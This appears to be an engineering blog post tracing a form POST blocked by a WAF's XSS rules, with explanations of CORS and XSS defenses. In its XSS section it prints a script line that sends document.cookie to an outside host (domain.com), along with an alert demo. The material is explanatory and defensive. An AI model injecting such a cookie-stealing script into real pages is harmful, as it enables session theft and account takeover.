Layer-by-layer analysis of an HTTP POST request incident

vivo Internet Server Team - Wei Ling

This article describes how we tracked down and fixed the cause of normal requests being misjudged as cross-domain, working from the company's network architecture and business characteristics.

1. Problem description

The back-office system of one of our businesses reported a cross-domain error when a form was submitted, as shown in the following figure:

As the figure shows, the error was reported because the HTTP request failed to be sent. To investigate, we first need to understand the complete path an HTTP request takes.

An HTTP request generally passes through three layers: DNS, Nginx, and the web server. The process is as follows:

The browser first sends a query to the local carrier's DNS server and obtains the IP address for the requested domain name through domain name resolution.
After the browser obtains the IP address, it sends the HTTP request to Nginx, which reverse-proxies it to the web server.
Finally, the web server returns the requested resources.

With the basic HTTP request path in mind, we made a preliminary investigation and found that the form was submitted as a POST request in application/json format. The business system also separates the front end from the back end (the page domain name and the back-end service domain name are different), and a cross-domain solution had already been configured in Nginx. We based our analysis on these facts.

2. Troubleshooting steps

Step 1: Self-check

Since the failing request was a form submission, we used the controlled-variable method: modify one field at a time and resubmit. After many trials, we established that changes to the moduleExport field in the form caused the problem.

In this business, the moduleExport field holds a piece of JS code, so we tried deleting and modifying that code and found that the problem disappears when the JS code in moduleExport is small enough.
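
The controlled-variable procedure described above can be sketched roughly as follows. This is only an illustration: `findFailingFields`, the `submit` callback, and the stubbed form values are hypothetical names, and a real submission would be asynchronous rather than the synchronous stub used here.

```javascript
// Hypothetical helper: find which form fields make a submission fail by
// swapping one field at a time for a known-good baseline value.
// `submit` is an assumed function that returns true when the request succeeds.
function findFailingFields(form, baseline, submit) {
  const culprits = [];
  for (const key of Object.keys(form)) {
    // Change exactly one variable; keep every other field as submitted.
    const candidate = { ...form, [key]: baseline[key] };
    if (submit(candidate)) {
      culprits.push(key); // neutralising this field made the failure go away
    }
  }
  return culprits;
}

// Stub that imitates the observed behaviour: a large moduleExport fails.
const fakeSubmit = (f) => f.moduleExport.length < 20;

const failingForm = { name: "demo", moduleExport: "module.exports = { /* long JS */ }" };
const knownGood = { name: "demo", moduleExport: "" };

const suspects = findFailingFields(failingForm, knownGood, fakeSubmit);
console.log(suspects); // the stub blames only moduleExport
```

Changing one field per attempt keeps each result attributable to a single cause, which is the point of the method.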

Based on these findings, our first guess was that a request body size limit on the side handling the HTTP request was causing the problem.

Step 2: Check HTTP request body restrictions

Because the front and back ends are separated, the request is actually handled by the service behind the intranet domain name XXX.XXX.XXX. The response chain of the intranet domain name is as follows:

In theory, if an HTTP request body limit were the cause, it could be imposed at the LVS layer, the Nginx layer, or Tomcat. We checked them one by one:

First, the LVS layer. If the LVS layer fails, a gateway exception occurs and the return code is 502. We captured the packets to check the return code; as the figure below shows, it is 418, which rules out an LVS failure.

Next, check the Nginx layer. The HTTP configuration of the Nginx layer is as follows:

At the Nginx layer, the maximum supported HTTP request body is 50m, while the failing form request is about 2M, far below the limit. The problem is therefore not caused by the request body limit of the Nginx layer.

Then check the Tomcat layer and view the Tomcat configuration:

Tomcat's maximum POST request size is set to -1, which means unlimited, so the problem is not caused by the request body limit of the Tomcat layer either.

To sum up, we concluded that this problem has nothing to do with the size limit of the HTTP request body.
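
The size comparison made at each layer can be expressed as a small check. The sketch below assumes limits written in the Nginx style (a number with an optional k or m suffix) and uses -1 for "unlimited"; the function names are hypothetical, and the values are the ones quoted in the text.

```javascript
// Parse an Nginx-style size such as "50m" into bytes (k and m suffixes, base 1024).
function parseSize(text) {
  const match = /^(\d+)([km]?)$/i.exec(String(text).trim());
  if (!match) throw new Error(`unrecognised size: ${text}`);
  const factor = { "": 1, k: 1024, m: 1024 ** 2 };
  return Number(match[1]) * factor[match[2].toLowerCase()];
}

// A limit of -1 means "unlimited", as with the Tomcat setting described above.
function exceedsLimit(bodyBytes, limit) {
  if (limit === -1) return false;
  return bodyBytes > parseSize(limit);
}

const bodyBytes = 2 * 1024 ** 2; // the form body was about 2M
const layers = { nginx: "50m", tomcat: -1 }; // values reported in the article

for (const [layer, limit] of Object.entries(layers)) {
  console.log(layer, exceedsLimit(bodyBytes, limit) ? "rejects" : "accepts");
}
```

Both layers accept a body of this size, which matches the conclusion that the size limits are not the cause.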

So the question became: if none of these layers is responsible, is another factor or another network layer causing the problem?

Step 3: Brainstorm

We brought the relevant operations and maintenance teams into a group discussion, which went through two stages.

【First stage】

The operations engineers found that Tomcat is deployed in containers, and that between the containers and the Nginx layer there is a nameserver layer that comes with the container platform: ingress. We checked the ingress configuration and found that its HTTP request body limit is 3072m, so ingress was ruled out as the cause.

【Second stage】

A colleague from the security team said that, to prevent XSS attacks, the company performs XSS attack verification on all back-end requests. If the verification fails, a cross-domain error is reported.

That is to say, the theoretically complete network layer call chain is as follows:

Given how a WAF (Web Application Firewall) works and the symptoms of the problem, the WAF layer was the likely cause.

Step 4: WAF troubleshooting

With this hypothesis, we captured the packets again and tried to obtain the optrace path of the entire HTTP request to see whether it was intercepted at the WAF layer. The packet capture results are as follows:

The packet capture shows that the request status is complete, meaning the front-end request was sent successfully; the return code is 418, and a lookup of the IP address in optrace shows that it belongs to a WAF server.
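
The reasoning applied to the capture (status code plus the responding address) can be summarised in a small triage helper. This is a hypothetical sketch: `attributeResponse`, the `wafIps` list, and the address 10.0.0.8 are made up for illustration, and optrace is treated simply as a source for the responding IP.

```javascript
// Hypothetical triage helper. `wafIps` is an assumed list of known WAF
// addresses; 10.0.0.8 below is a made-up example, not a real server.
function attributeResponse(status, traceIp, wafIps) {
  if (wafIps.includes(traceIp)) return "waf";      // answered by a WAF node
  if (status === 502) return "gateway";            // gateway failure, as described for LVS
  if (status >= 200 && status < 300) return "ok";  // request reached the service
  return "unknown";
}

console.log(attributeResponse(418, "10.0.0.8", ["10.0.0.8"])); // "waf"
console.log(attributeResponse(502, "10.0.0.9", ["10.0.0.8"])); // "gateway"
```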

In summary, the change to the moduleExport field in the form most likely caused the request to be intercepted at the WAF layer. The content of the moduleExport field in question is as follows:

 module.exports = {
    "labelWidth": 80,
    "schema": {
        "title": "XXX",
        "type": "array",
        "items":{
            "type":"object",
            "required":["key","value"],
            "properties":{
                "conf":{
                    "title":"XXX",
                    "type":"string"
                },
                "configs":{
                    "title":"XXX",
                    "type":"array",
                    "items":{
                        ......
                            config: {
                                ......
                                validator: function(value, callback) {
                                    // At least one item must be filled in
                                    if(!value || !Object.keys(value).length) {
                                        return callback(new Error('至少填写一项'))
                                    }
 
                                    callback()
                                }
                            }
              ......
      }

Investigating the field attribute by attribute, we determined that the module.exports.items.properties.configs.config.validator attribute triggers the WAF interception mechanism: when a request packet passes through the WAF module, it is matched against all attack rules, and if it hits a risk rule, the interception action is triggered.
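
To make the interception mechanism concrete, here is a minimal sketch of rule matching against a request body. The three rules are invented for illustration and are not the company's WAF configuration; real rule sets are much larger. The 418 status is the one observed in this incident.

```javascript
// Illustrative rules only; real WAF rule sets are far larger and these
// patterns are assumptions, not the company's actual configuration.
const rules = [
  { id: "script-tag", pattern: /<script\b/i },
  { id: "inline-function", pattern: /function\s*\([^)]*\)\s*\{/ },
  { id: "cookie-access", pattern: /document\.cookie/i },
];

// Return the ids of every rule that the raw request body matches.
function matchRules(body) {
  return rules.filter((rule) => rule.pattern.test(body)).map((rule) => rule.id);
}

// Intercept with 418 (the code seen in this incident) when any rule hits.
function inspect(body) {
  const hits = matchRules(body);
  return hits.length > 0 ? { status: 418, hits } : { status: 200, hits };
}

const payload = JSON.stringify({
  moduleExport: "validator: function(value, callback) { callback() }",
});
console.log(inspect(payload).status); // 418
console.log(inspect(JSON.stringify({ moduleExport: '{"labelWidth": 80}' })).status); // 200
```

A legitimate validator function in a JSON field looks the same to such a rule as injected script, which is how a normal request can be intercepted.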

3. Problem Analysis

The root cause of the failure is that the content of the business request triggered the WAF's XSS attack detection. This raises two questions:

Why is a WAF needed?
What is an XSS attack?

Before explaining XSS, we must first clarify the browser's cross-domain protection mechanism.

3.1 Cross-domain protection mechanism

Modern browsers all enforce a 'same-origin policy'. Under this policy, two addresses have the same origin only if all of the following are identical:

Protocol (HTTP or HTTPS)
Domain name
Port

Only pages of the same origin may access the same cookies and localStorage, send Ajax requests to one another, and so on. Access between different origins is called cross-domain access. Day-to-day development has legitimate cross-domain requirements. For example, in the system involved in this problem, the front and back ends are separated, so the domain name of the page and the domain name of the back end must be different. How to cross domains in a controlled way thus becomes a problem.
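
The same-origin comparison can be sketched with the standard `URL` class, whose `origin` property combines protocol, host name, and port. The example.com addresses are placeholders.

```javascript
// Two URLs are same-origin when protocol, host name and port all match.
// URL.origin normalises default ports (80 for http, 443 for https).
function isSameOrigin(a, b) {
  return new URL(a).origin === new URL(b).origin;
}

console.log(isSameOrigin("https://admin.example.com/page", "https://admin.example.com:443/api")); // true
console.log(isSameOrigin("https://admin.example.com/page", "https://api.example.com/submit"));    // false
console.log(isSameOrigin("http://admin.example.com/", "https://admin.example.com/"));              // false
```

The second case mirrors the situation in this article: a page on one domain name calling a back-end service on another.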

Common cross-domain solutions are IFRAME, JSONP, and CORS.

IFRAME generates an IFRAME inside the page and dynamically writes JS inside it to perform the submission. Early frameworks such as EXT used this technique.
JSONP serializes the request into a string and then issues a JS request carrying that string. It requires back-end support and works only with GET requests. The industry has largely abandoned this scheme.
CORS is widely used, and the system in this incident uses CORS to support its front-end/back-end separation. So, what is the CORS protocol?

3.2 CORS Protocol

CORS (Cross-Origin Resource Sharing) is a W3C standard that addresses the browser's cross-domain restriction. The core idea is to set the corresponding fields in the HTTP request headers. Once these fields are set, the request is sent as usual, and the back end checks the fields to decide whether the request is a legitimate cross-domain request.

CORS requires support from the server software itself (not the business code running on it), for example Tomcat 7 and later versions.

For developers, CORS communication is no different from same-origin AJAX communication, and the code is exactly the same. When the browser finds that an AJAX request is cross-origin, it automatically adds some extra header information, and sometimes makes an additional request, but the user does not notice.
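
The "additional request" is the preflight OPTIONS request that browsers send before non-simple cross-origin requests. The sketch below is a simplified version of that decision; the full rules in the Fetch standard include further conditions, and `needsPreflight` is a hypothetical name.

```javascript
// Simplified version of the "simple request" test: the full rules in the
// Fetch standard have further conditions (for example on header values).
const SIMPLE_METHODS = ["GET", "HEAD", "POST"];
const SIMPLE_CONTENT_TYPES = [
  "application/x-www-form-urlencoded",
  "multipart/form-data",
  "text/plain",
];
const SAFELISTED_HEADERS = ["accept", "accept-language", "content-language", "content-type"];

function needsPreflight(method, headers = {}) {
  if (!SIMPLE_METHODS.includes(method.toUpperCase())) return true;
  for (const [name, value] of Object.entries(headers)) {
    const lower = name.toLowerCase();
    if (!SAFELISTED_HEADERS.includes(lower)) return true;
    if (lower === "content-type") {
      // Ignore parameters such as "; charset=utf-8" when comparing.
      const mime = String(value).split(";")[0].trim().toLowerCase();
      if (!SIMPLE_CONTENT_TYPES.includes(mime)) return true;
    }
  }
  return false;
}

console.log(needsPreflight("POST", { "Content-Type": "application/json" })); // true
console.log(needsPreflight("POST", { "Content-Type": "text/plain" }));       // false
```

A POST with an application/json body, like the form in this article, therefore triggers a preflight when sent cross-origin.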

Therefore, the key to CORS communication is the server, which decides which domains may send requests. Cross-origin communication is possible as long as the server implements the CORS protocol.
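
On the server side, the decision comes down to which response headers are returned for a given Origin. The following is a minimal sketch, not the Nginx configuration used in this system: the allowlist and the `corsHeaders` function are assumptions for illustration, while the header names are the standard CORS response headers.

```javascript
// Hypothetical allowlist; the origin below is a placeholder.
const ALLOWED_ORIGINS = new Set(["https://admin.example.com"]);

// Build CORS response headers for a request's Origin header value.
// An empty object means the browser will block the cross-origin response.
function corsHeaders(origin) {
  if (!origin || !ALLOWED_ORIGINS.has(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Methods": "GET, POST, OPTIONS",
    "Access-Control-Allow-Headers": "Content-Type",
    "Vary": "Origin", // responses differ per origin, so caches must key on it
  };
}

console.log(corsHeaders("https://admin.example.com"));
console.log(corsHeaders("https://evil.example.net")); // {}
```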

Although CORS solves the cross-domain problem, it also introduces risks such as XSS attacks, so a Web Application Firewall (WAF) layer is added in front of the server. Its job is to filter all requests. When a request is found to be cross-domain, the entire request message is matched against the rules. If the request fails the rule check, an error is returned (418 in this case).

The overall process is as follows:

Illegitimate cross-domain requests are generally regarded as attacks, and we treat this type of request as an XSS attack. So what is an XSS attack in the broader sense?

3.3 XSS attack mechanism

XSS is short for Cross-Site Scripting, an attack that injects code, including HTML and JavaScript, into web pages that users browse.

For example, on a forum site, an attacker could post the following:

 <script>location.href="//domain.com/?c=" + document.cookie</script>

This content may then be rendered as:

 <p><script>location.href="//domain.com/?c=" + document.cookie</script></p>

Another user who views a page with this content is redirected to domain.com, carrying the cookie of the current scope. If the forum manages login state through cookies, the attacker can use this cookie to log in to the victim's account.

Besides stealing cookies, XSS can forge input forms to trick users into revealing personal information, display fake articles or pictures, and so on. With a stolen cookie, an attacker can impersonate the user to access various systems, which is extremely harmful.

Two XSS defense mechanisms are given below.

3.4 XSS defense mechanism

The XSS defense mechanism mainly includes the following two points:

3.4.1 Set the cookie as HttpOnly

A cookie marked HttpOnly cannot be accessed by JavaScript, so the user's cookie information cannot be obtained through document.cookie.
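
As a rough illustration, the server sets this flag in the Set-Cookie response header. `buildSetCookie` is a hypothetical helper and the cookie name and value are placeholders; `HttpOnly`, `Secure`, and `Path` are standard cookie attributes.

```javascript
// Build a Set-Cookie header value. HttpOnly hides the cookie from
// document.cookie; Secure restricts it to HTTPS connections.
function buildSetCookie(name, value, { httpOnly = true, secure = true, path = "/" } = {}) {
  const parts = [`${name}=${encodeURIComponent(value)}`, `Path=${path}`];
  if (httpOnly) parts.push("HttpOnly");
  if (secure) parts.push("Secure");
  return parts.join("; ");
}

console.log(buildSetCookie("session", "abc123"));
// session=abc123; Path=/; HttpOnly; Secure
```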

3.4.2 Filter special characters

For example, escape < to &lt; and > to &gt; so that HTML and JavaScript code cannot run.
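
A minimal escaping helper might look like the sketch below. In addition to the angle brackets mentioned above, it escapes the ampersand and both quote characters, which is a common choice when the output may also land inside HTML attributes; `escapeHtml` is a hypothetical name.

```javascript
// Map each HTML-significant character to its entity.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

console.log(escapeHtml("<script>alert(/xss/)</script>"));
// &lt;script&gt;alert(/xss/)&lt;/script&gt;
```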

Rich text editors allow users to enter HTML code, so characters such as < cannot simply be filtered out, which greatly increases the possibility of XSS attacks.

Rich text editors usually use an XSS filter to prevent XSS attacks: tag whitelists or blacklists are defined so that dangerous HTML cannot be entered.

In the following example, tags such as form and script are escaped, while tags such as h and p are preserved.

 <h1 id="title">XSS Demo</h1>
 
<p>123</p>
 
<form>
  <input type="text" name="q" value="test">
</form>
 
<pre>hello</pre>
 
<script type="text/javascript">
alert(/xss/);
</script>

After escaping:

 <h1>XSS Demo</h1>
 
<p>123</p>
 
&lt;form&gt;
&lt;input type="text" name="q" value="test"&gt;
&lt;/form&gt;
 
<pre>hello</pre>
 
&lt;script type="text/javascript"&gt;
alert(/xss/);
&lt;/script&gt;
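
The transformation shown above can be approximated with a tag whitelist. The sketch below is deliberately naive and for illustration only: the whitelist (h1, p, pre) is assumed from the example, attributes on kept tags are dropped, and production code should rely on a well-tested sanitizer rather than regular expressions.

```javascript
// Naive whitelist filter for illustration only; production code should rely
// on a well-tested sanitiser rather than regular expressions.
const ALLOWED_TAGS = new Set(["h1", "p", "pre"]); // assumed whitelist

function filterTags(html) {
  return html.replace(/<(\/?)([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g, (whole, slash, tag) => {
    if (ALLOWED_TAGS.has(tag.toLowerCase())) {
      return `<${slash}${tag}>`; // keep the tag but drop its attributes
    }
    return whole.replace(/</g, "&lt;").replace(/>/g, "&gt;"); // escape the tag
  });
}

const input =
  '<h1 id="title">XSS Demo</h1>' +
  '<form><input type="text" name="q" value="test"></form>' +
  '<script type="text/javascript">alert(/xss/);</script>';

console.log(filterTags(input));
```

Whitelisted tags survive without their attributes, while everything else is rendered as inert text.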

4. Problem solving

After identifying the problem and having the security team modify the WAF's blocking rules, the problem disappeared.

Finally, this issue is summarized.

5. Summary of the problem

Looking back at the whole troubleshooting process, most of the effort went into locating the problem: determining which module was at fault. The biggest difficulty in locating the module was our incomplete understanding of the entire network path (we did not know that the WAF layer existed).

So how can we solve similar problems faster? I think there are two things to note:

Use the controlled-variable method to pin down the boundary of the problem precisely: when it occurs and when it does not.
Know which modules exist, and understand the responsibility boundaries and risks of each.

Let's explain one by one:

5.1 Determining problem boundaries

At the beginning, after determining that the problem was caused by the form, we modified and verified the fields one by one and finally identified the field responsible. We then broke that field down and analyzed each of its attributes in turn, which led to the conclusion that the value of the XX attribute violated the WAF rules.

5.2 Locating the faulty module

In this case, the cross-domain rejection originated mainly at the network layer, so we had to understand the network hierarchy of the entire business service and then analyze each layer in turn.

At the Nginx layer, we analyze the configuration file
At the ingress layer, we analyze the configuration rules in it
At the Tomcat layer, we analyze the properties of server.xml

In conclusion, we must be familiar with the responsibilities of each module and know how to judge whether each module is working properly within the entire path. Only on this basis can we gradually narrow down the scope of the problem and finally find the answer.
